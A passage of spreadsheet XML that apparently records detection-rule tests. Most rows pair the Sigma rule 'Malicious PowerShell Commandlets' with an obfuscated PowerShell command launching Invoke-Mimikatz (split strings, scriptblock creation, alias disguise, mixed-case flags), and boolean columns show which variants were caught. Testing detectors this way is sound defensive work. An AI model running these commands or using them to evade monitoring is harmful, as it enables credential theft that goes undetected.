      <c r="I1238" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1238" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1238" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1239" ht="15.75" customHeight="1" s="42">
      <c r="A1239" s="43" t="n"/>
      <c r="B1239" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1239" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1239" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1239" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1239" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1239" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1239" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1239" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1239" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1239" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1240" ht="15.75" customHeight="1" s="42">
      <c r="A1240" s="43" t="n"/>
      <c r="B1240" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1240" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1240" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1240" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1240" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1240" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1240" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1240" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1240" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1240" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1241" ht="15.75" customHeight="1" s="42">
      <c r="A1241" s="43" t="n"/>
      <c r="B1241" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1241" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1241" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1241" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1241" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1241" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1241" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1241" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1241" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1241" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1242" ht="15.75" customHeight="1" s="42">
      <c r="A1242" s="43" t="n"/>
      <c r="B1242" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1242" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1242" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1242" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1242" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1242" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1242" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1242" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1242" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1242" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1243" ht="15.75" customHeight="1" s="42">
      <c r="A1243" s="43" t="n"/>
      <c r="B1243" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1243" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1243" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1243" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMand "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1243" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1243" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1243" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1243" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1243" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1243" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1244" ht="15.75" customHeight="1" s="42">
      <c r="A1244" s="43" t="n"/>
      <c r="B1244" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1244" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1244" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1244" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1244" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1244" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1244" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1244" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1244" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1244" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1245" ht="15.75" customHeight="1" s="42">
      <c r="A1245" s="43" t="n"/>
      <c r="B1245" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1245" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1245" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1245" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1245" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1245" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1245" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I124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45" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1245" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1246" ht="15.75" customHeight="1" s="42">
      <c r="A1246" s="43" t="n"/>
      <c r="B1246" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1246" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1246" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1246" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1246" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1246" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1246" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1246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46" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1246" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1247" ht="15.75" customHeight="1" s="42">
      <c r="A1247" s="43" t="n"/>
      <c r="B1247" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1247" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1247" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1247" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1247" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1247" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1247" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I124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47" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1247" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1248" ht="15.75" customHeight="1" s="42">
      <c r="A1248" s="43" t="n"/>
      <c r="B1248" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1248" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1248" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1248" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1248" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1248" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1248" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1248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48" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1248" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1249" ht="15.75" customHeight="1" s="42">
      <c r="A1249" s="43" t="n"/>
      <c r="B1249" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1249" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1249" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1249" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1249" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1249" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1249" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1249" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1249" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1249" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1250" ht="15.75" customHeight="1" s="42">
      <c r="A1250" s="43" t="n"/>
      <c r="B1250" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1250" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1250" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1250" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1250" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1250" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1250" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1250" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1250" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1250" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1251" ht="15.75" customHeight="1" s="42">
      <c r="A1251" s="43" t="n"/>
      <c r="B1251" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1251" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1251" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1251" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1251" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1251" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1251" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1251" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1251" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1251" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1252" ht="15.75" customHeight="1" s="42">
      <c r="A1252" s="43" t="n"/>
      <c r="B1252" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1252" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1252" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1252" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaNd "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1252" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1252" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1252" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1252" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1252" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1252" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1253" ht="15.75" customHeight="1" s="42">
      <c r="A1253" s="43" t="n"/>
      <c r="B1253" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1253" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1253" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1253" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1253" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1253" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1253" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1253" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1253" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1253" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1254" ht="15.75" customHeight="1" s="42">
      <c r="A1254" s="43" t="n"/>
      <c r="B1254" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1254" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1254" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1254" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1254" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1254" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1254" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I125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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1254" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1255" ht="15.75" customHeight="1" s="42">
      <c r="A1255" s="43" t="n"/>
      <c r="B1255" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1255" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1255" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1255" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1255" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1255" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1255" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I125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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1255" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1256" ht="15.75" customHeight="1" s="42">
      <c r="A1256" s="43" t="n"/>
      <c r="B1256" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1256" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1256" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1256" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1256" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1256" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1256" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I125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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1256" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1257" ht="15.75" customHeight="1" s="42">
      <c r="A1257" s="43" t="n"/>
      <c r="B1257" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1257" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1257" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1257" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1257" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1257" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1257" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I125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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1257" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1258" ht="15.75" customHeight="1" s="42">
      <c r="A1258" s="43" t="n"/>
      <c r="B1258" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1258" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1258" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1258" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1258" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1258" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1258" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I12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8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1258" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1259" ht="15.75" customHeight="1" s="42">
      <c r="A1259" s="43" t="n"/>
      <c r="B1259" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1259" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1259" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1259" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1259" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1259" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1259" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I12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59" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1259" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1260" ht="15.75" customHeight="1" s="42">
      <c r="A1260" s="43" t="n"/>
      <c r="B1260" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1260" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1260" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1260" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1260" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1260" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1260" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I126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0" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1260" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1261" ht="15.75" customHeight="1" s="42">
      <c r="A1261" s="43" t="n"/>
      <c r="B1261" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1261" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1261" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1261" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1261" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1261" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1261" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I126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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1261" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1262" ht="15.75" customHeight="1" s="42">
      <c r="A1262" s="43" t="n"/>
      <c r="B1262" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1262" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1262" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1262" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1262" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1262" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1262" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I126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2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1262" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1263" ht="15.75" customHeight="1" s="42">
      <c r="A1263" s="43" t="n"/>
      <c r="B1263" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1263" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1263" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1263" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1263" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1263" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1263" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I126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3" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1263" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1264" ht="15.75" customHeight="1" s="42">
      <c r="A1264" s="43" t="n"/>
      <c r="B1264" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1264" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1264" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1264" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnD "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1264" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1264" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1264" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I126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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1264" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1265" ht="15.75" customHeight="1" s="42">
      <c r="A1265" s="43" t="n"/>
      <c r="B1265" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1265" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1265" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1265" s="36" t="inlineStr">
        <is>
